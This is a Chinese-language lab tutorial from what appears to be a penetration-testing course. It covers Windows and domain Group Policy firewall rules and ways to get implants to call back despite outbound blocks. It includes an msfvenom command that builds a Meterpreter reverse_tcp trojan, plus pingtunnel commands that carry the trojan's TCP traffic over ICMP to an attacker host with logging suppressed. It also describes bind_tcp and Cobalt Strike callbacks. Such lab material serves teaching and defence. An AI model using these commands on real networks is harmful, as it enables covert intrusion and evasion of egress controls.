第123天:内网安全-域防火墙&入站出站规则&不出网隧道上线&组策略对象同步

目录

[案例一: 单机-防火墙-限制端口\协议出入站](#案例一: 单机-防火墙-限制端口\协议出入站)

案例二:不出网的解决思路

入站连接

隧道技术

案例三:域控-防火墙-组策略对象同步

案例四:域控-防火墙-组策略不出网上线

msf

cs


案例一: 单机-防火墙-限制端口\协议出入站

入站是指别人主动来连接/访问你

在一个单机系统当中只启动一个共用防火墙,剩下都关闭

启动网站服务,当这个启动的时候,curl访问网站失败

而当关闭入站连接的时候,网站又会重现显示,这是入站的时候被阻止了

而出站是自己主动的去访问别人,windows防火墙出站默认是允许的

这里制作一个msf木马进行上传

msf开启监听

不设置规则的时候这个时候运行木马是可以进行连接的

设置一个出站限制

设置端口

设置规则

设置应用的防火墙范围

设置名称

这个时候运行没有任何反应

这样也只是禁用了一个端口,假如别人用的是4444端口,这里尝试修改禁止所有端口出站

自然就无法连接msf了

案例二:不出网的解决思路

入站连接

出站被限制死了,但是入站没有,可以主动连接木马

采用 windows/meterpreter/bind_tcp就是主动进行正向连接(入站)

生成正向连接的木马进行上传

设置模块,以及远程地址,运行木马,等待正向链接

隧道技术

限制了tcp协议,但是这些协议是向下兼容的,限制了tcp,也并非就限制了网络层以下类似icmp等协议

这里设置禁用所有tcp协议

去访问百度的时候会发现,浏览器无法访问,但是可以ping通

因为浏览器走的协议是http协议,而ping协议走的是icmp协议,所以隧道的思路就是把tcp协议利用icmp等等别的协议进行出网转发

案例三:域控-防火墙-组策略对象同步

在域控主机中打开组策略管理

找到域然后新建连接

配置该连接,右键点击配置

配置防火墙策略,域,专用,公用全部设置开启

域内主机,防火墙初始状态

更新组策略的命令

复制代码
gpupdate/force

现在主机状态

也可以采用重启或者强制进行重置

配置禁止出网的规则

三个网络都配置,命名为no

尝试更新

案例四:域控-防火墙-组策略不出网上线

两种情况

这里目前是有网络,但是tcp封杀第二种情况,用的隧道技术

msf

首先先生成一个msf木马,生成的时候把地址设置为127.0.0.1,反弹给自己的3333端口

复制代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe -o msf.exe

设置msf进行监听

这里需要把3333端口通过icmp协议转发到这个攻击主机的4444端口用到的项目地址

GitHub - esrrhs/pingtunnel: Pingtunnel is a tool that send TCP/UDP traffic over ICMP

下载这两个版本

linux传到攻击主机,windows传到被控主机

kali开启隧道用来接收别人通过icmp传给自己的,传过来将其又转换为tcp端口(sudo权限)

复制代码
sudo ./pingtunnel -type server

windows被控主机开启工具,将自己的3333端口监听发送给攻击主机的4444端口(需要管理员权限)noprint nolog是指不要输出日志

复制代码
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.172.132 -t 192.168.172.132:4444 -tcp 1 -noprint 1 -nolog 1

这个时候再运行木马,成功上线

cs

设置反弹给自己的监听模块

利用这个监听器生成一个木马

再设置一个接收反弹信息的监听器

windows通过icmp反弹5555端口

kali开启隧道

运行木马,成功反弹shell

相关推荐
叶落阁主22 分钟前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954482 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机2 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机2 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954482 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star2 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954482 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher4 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行7 天前
网络安全总结
安全·web安全
red1giant_star7 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全